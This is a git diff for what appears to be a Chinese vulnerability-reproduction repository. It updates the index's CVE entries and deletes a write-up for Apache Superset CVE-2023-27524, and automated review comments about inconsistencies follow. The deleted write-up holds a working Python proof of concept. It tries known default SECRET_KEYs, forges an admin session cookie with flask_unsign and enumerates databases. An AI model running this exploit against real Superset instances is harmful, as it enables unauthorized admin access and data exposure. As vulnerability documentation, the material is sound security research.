diff --git a/README.md b/README.md index 6fe07d3..91679f8 100644 --- a/README.md +++ b/README.md @@ -253,7 +253,8 @@ * Apache Airflow 远程代码执行漏洞 CVE-2022-40127 * Apache Airflow 默认密钥导致的权限绕过 CVE-2020-17526 * Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323 - * Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524 + * Apache Superset Python Pickle 反序列化导致远程代码执行 CVE-2023-37941 + * Apache Superset 硬编码 JWT 密钥导致认证绕过漏洞 CVE-2023-27524 * Apache Unomi 远程表达式代码执行漏洞 CVE-2020-13942 * Apache Zeppelin 未授权任意命令执行漏洞 * Appspace jsonprequest SSRF漏洞 CVE-2021-27670 @@ -281,8 +282,10 @@ * Atlassian Questions For Confluence 身份认证绕过漏洞 CVE-2022-26138 * AVCON6 系统管理平台 download.action 任意文件下载漏洞 * AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞 + * Cacti graph_view.php SQL注入导致远程代码执行漏洞 CVE-2023-39361&CVE-2024-31459 + * Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169 + * Cacti RRDTool 后台参数注入导致远程代码执行 CVE-2025-24367 * Cacti SQL 注入漏洞 CVE-2020-14295 - * Cacti 前台命令注入漏洞 CVE-2022-46169 * CactiEZ weathermap 插件任意文件写入漏洞 * Casbin get-users 账号密码泄漏漏洞 * Casdoor static 任意文件读取漏洞 @@ -827,6 +830,8 @@ * ThinkPHP5 5.0.22 5.1.29 远程代码执行漏洞 * ThinkPHP5 5.0.23 远程代码执行漏洞 * ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 + * Vite 开发服务器任意文件读取漏洞 CNVD-2022-44615 + * Vite 开发服务器任意文件读取漏洞绕过 CVE-2025-30208 * XStream SSRF 反序列化漏洞 CVE-2020-26258 * XStream 任意文件删除 反序列化漏洞 CVE-2020-26259 * XStream 反序列化命令执行漏洞 CVE-2021-21351 diff --git a/Web应用漏洞/Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524.md b/Web应用漏洞/Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524.md deleted file mode 100644 index a2f9bbf..0000000 --- a/Web应用漏洞/Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524.md +++ /dev/null 
@@ -1,205 +0,0 @@ -# Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524 - -## 漏洞描述 - -Apache Superset 是一款现代化的开源大数据工具,也是企业级商业智能 Web 应用,用于数据探索分析和数据可视化。它提供了简单易用的无代码可视化构建器和声称是最先进的 SQL 编辑器,用户可以使用这些工具快速地构建数据仪表盘。CVE-2023-27524 中,未经授权的攻击者可根据默认配置的SECRET_KEY伪造成管理员用户访问Apache Superset。 - -## 漏洞影响 - -``` -Apache Superse <= 2.0.1 -``` - -## QUAKE - -``` -app.name="Apache Superset" -``` - -## 漏洞复现 - -登陆页面 - -![image-20230504141719702](images/image-20230504141719702.png) - -漏洞修复补丁 - -``` -https://github.com/apache/superset/pull/23186/files -``` - -![image-20230504142107277](images/image-20230504142107277.png) - -补丁代码中,新建了判断用户是否使用了默认的Key进行配置,如果为默认的Key,就直接中断启动,。但在 Docker的 env 下还是添加了固定的 Key: TEST_NON_DEV_SECRET - -![image-20230504142118809](images/image-20230504142118809.png) - -``` -# https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py -SECRET_KEYS = [ - b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1 - b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1 - b'thisISaSECRET_1234', # deployment template - b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation - b'TEST_NON_DEV_SECRET' # docker compose -] -``` - -以Docker下的环境举例 - -![image-20230504142138933](images/image-20230504142138933.png) - -初次请求时会获取到 Cookie, 使用默认Key验证 Cookie是否可被伪造 - -![image-20230504142150081](images/image-20230504142150081.png) - -登陆主页面观察主要参数 - -![image-20230504142206013](images/image-20230504142206013.png) - -通过设置参数 user_id 和 _user_id 为 1 ,构造加密Cookie - -``` ->>> from flask_unsign import session ->>> session.sign({'_user_id': 1, 'user_id': 1},'TEST_NON_DEV_SECRET') -'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZE51uw.EdD7zSzojgY4keqZLOKR4GndJf8' -``` - -利用构造的 Cookie就可以获取到 Web后台管理权限, 后台中存在数据库语句执行模块,通过设置允许执行其他数据库语句后利用数据库语句 RCE - -![image-20230504142222421](images/image-20230504142222421.png) - -![image-20230504142234700](images/image-20230504142234700.png) - -## 漏洞POC - -```python -from flask_unsign import session -import requests -import urllib3 -import argparse -import re 
-from time import sleep -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) - - -SECRET_KEYS = [ - b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1 - b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1 - b'thisISaSECRET_1234', # deployment template - b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation - b'TEST_NON_DEV_SECRET' # docker compose -] - -def main(): - - parser = argparse.ArgumentParser() - parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True) - parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1') - parser.add_argument('--validate', '-v', help='Validate login', required=False, action='store_true') - parser.add_argument('--timeout', '-t', help='Time to wait before using forged session cookie, default=5s', required=False, type=int, default=5) - args = parser.parse_args() - - try: - u = args.url.rstrip('/') + '/login/' - - headers = { - 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' - } - - resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) - if resp.status_code != 200: - print(f'Error retrieving login page at {u}, status code: {resp.status_code}') - return - - session_cookie = None - for c in resp.cookies: - if c.name == 'session': - session_cookie = c.value - break - - if not session_cookie: - print('Error: No session cookie found') - return - - print(f'Got session cookie: {session_cookie}') - - try: - decoded = session.decode(session_cookie) - print(f'Decoded session cookie: {decoded}') - except: - print('Error: Not a Flask session cookie') - return - - match = re.search(r'"version_string": "(.*?)"', resp.text) - if match: - version = match.group(1) - else: - version = 'Unknown' - - print(f'Superset Version: {version}') - - - for i, k in enumerate(SECRET_KEYS): - cracked = session.verify(session_cookie, k) - if cracked: - 
break - - if not cracked: - print('Failed to crack session cookie') - return - - print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}') - - try: - user_id = int(args.id) - except: - user_id = args.id - - forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k) - print(f'Forged session cookie for user {user_id}: {forged_cookie}') - - if args.validate: - try: - headers['Cookie'] = f'session={forged_cookie}' - print(f'Sleeping {args.timeout} seconds before using forged cookie to account for time drift...') - sleep(args.timeout) - resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) - if resp.status_code == 302: - print(f'Got 302 on login, forged cookie appears to have been accepted') - validated = True - else: - print(f'Got status code {resp.status_code} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.') - except Exception as e_inner: - print(f'Got error {e_inner} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.') - - if not validated: - return - - print('Enumerating databases') - for i in range(1, 101): - database_url_base = args.url.rstrip('/') + '/api/v1/database' - try: - r = requests.get(f'{database_url_base}/{i}', headers=headers, verify=False, timeout=30, allow_redirects=False) - if r.status_code == 200: - result = r.json()['result'] # validate response is JSON - name = result['database_name'] - print(f'Found database {name}') - elif r.status_code == 404: - print(f'Done enumerating databases') - break # no more databases - else: - print(f'Unexpected error: status code={r.status_code}') - break - except Exception as e_inner: - print(f'Unexpected error: {e_inner}') - break - - - except Exception as e: - print(f'Unexpected error: {e}') - - -if __name__ == '__main__': - main() -``` \ No newline at end of file 
diff --git a/Web应用漏洞/Cacti 前台命令注入漏洞 CVE-2022-46169.md b/Web应用漏洞/Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169.md similarity index 97% rename from Web应用漏洞/Cacti 前台命令注入漏洞 CVE-2022-46169.md rename to Web应用漏洞/Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169.md index 8da4aca..da85c61 100644 --- a/Web应用漏洞/Cacti 前台命令注入漏洞 CVE-2022-46169.md +++ b/Web应用漏洞/Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169.md @@ -1,4 +1,4 @@ -# Cacti 前台命令注入漏洞 CVE-2022-46169 +# Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169 Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。 diff --git a/Web应用漏洞/images/image-20230504141719702.png b/Web应用漏洞/images/image-20230504141719702.png deleted file mode 100644 index c1c2627..0000000 Binary files a/Web应用漏洞/images/image-20230504141719702.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142107277.png b/Web应用漏洞/images/image-20230504142107277.png deleted file mode 100644 index 1c949ce..0000000 Binary files a/Web应用漏洞/images/image-20230504142107277.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142118809.png b/Web应用漏洞/images/image-20230504142118809.png deleted file mode 100644 index 8b0c66a..0000000 Binary files a/Web应用漏洞/images/image-20230504142118809.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142138933.png b/Web应用漏洞/images/image-20230504142138933.png deleted file mode 100644 index c8c87f9..0000000 Binary files a/Web应用漏洞/images/image-20230504142138933.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142150081.png b/Web应用漏洞/images/image-20230504142150081.png deleted file mode 100644 index b0ee273..0000000 Binary files a/Web应用漏洞/images/image-20230504142150081.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142206013.png b/Web应用漏洞/images/image-20230504142206013.png deleted file mode 100644 index e1197e6..0000000 Binary files a/Web应用漏洞/images/image-20230504142206013.png and /dev/null differ 
diff --git a/Web应用漏洞/images/image-20230504142222421.png b/Web应用漏洞/images/image-20230504142222421.png deleted file mode 100644 index 4adf234..0000000 Binary files a/Web应用漏洞/images/image-20230504142222421.png and /dev/null differ diff --git a/中间件漏洞/images/Next.js 中间件鉴权绕过漏洞 CVE-2025-29927/image-20250324115309066.png b/中间件漏洞/images/Next.js 中间件鉴权绕过漏洞 CVE-2025-29927/image-20250324115309066.png deleted file mode 100644 index f9a8178..0000000 Binary files a/中间件漏洞/images/Next.js 中间件鉴权绕过漏洞 CVE-2025-29927/image-20250324115309066.png and /dev/null differ
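Review bot: the README hunk at `@@ -253,7 +253,8 @@` retitles CVE-2023-27524 as `Apache Superset 硬编码 JWT 密钥导致认证绕过漏洞`, but the write-up this same patch deletes describes forging the Flask `session` cookie with `flask_unsign` and a default `SECRET_KEY` (`session.sign({'_user_id': 1, 'user_id': 1},'TEST_NON_DEV_SECRET')`), not a JWT; a title along the lines of `Apache Superset 默认 SECRET_KEY 导致认证绕过漏洞 CVE-2023-27524` would match what the document actually covers and keep the `SECRET_KEY` keyword searchable in the index.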
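Review bot: in the hunk at `@@ -281,8 +282,10 @@` the entry `Cacti graph_view.php SQL注入导致远程代码执行漏洞 CVE-2023-39361&CVE-2024-31459` joins two identifiers with a bare `&`, while the README elsewhere separates combined items with ` && ` (`ThinkPHP5 SQL注入漏洞 && 敏感信息泄露`); pick one convention, and consider a separator that survives markdown rendering such as `CVE-2023-39361 && CVE-2024-31459`. The removal of `Cacti 前台命令注入漏洞 CVE-2022-46169` and addition of `Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169` is consistent with the file rename later in the patch.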
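Review bot: the hunk `@@ -1,205 +0,0 @@` deletes the whole CVE-2023-27524 write-up and seven of its screenshots, yet the README hunks in this same patch keep an entry for CVE-2023-27524 and add entries for CVE-2023-37941, CVE-2023-39361 / CVE-2024-31459, CVE-2025-24367, CNVD-2022-44615 and CVE-2025-30208, none of which gets a markdown file in this diff; as submitted the index points at six documents that do not exist in the tree. Either add the new write-ups here or state in the commit message which commit carries them. One image the deleted document referenced, `images/image-20230504142234700.png`, is not removed in this diff and will be left orphaned next to the seven that are.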
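Review bot: the last hunk deletes `中间件漏洞/images/Next.js 中间件鉴权绕过漏洞 CVE-2025-29927/image-20250324115309066.png`, but no change to the Next.js CVE-2025-29927 document appears in this diff; if that write-up still references the image, the deletion breaks its rendering, and if this is unrelated cleanup it belongs in its own commit rather than in a Superset/Cacti/Vite index update.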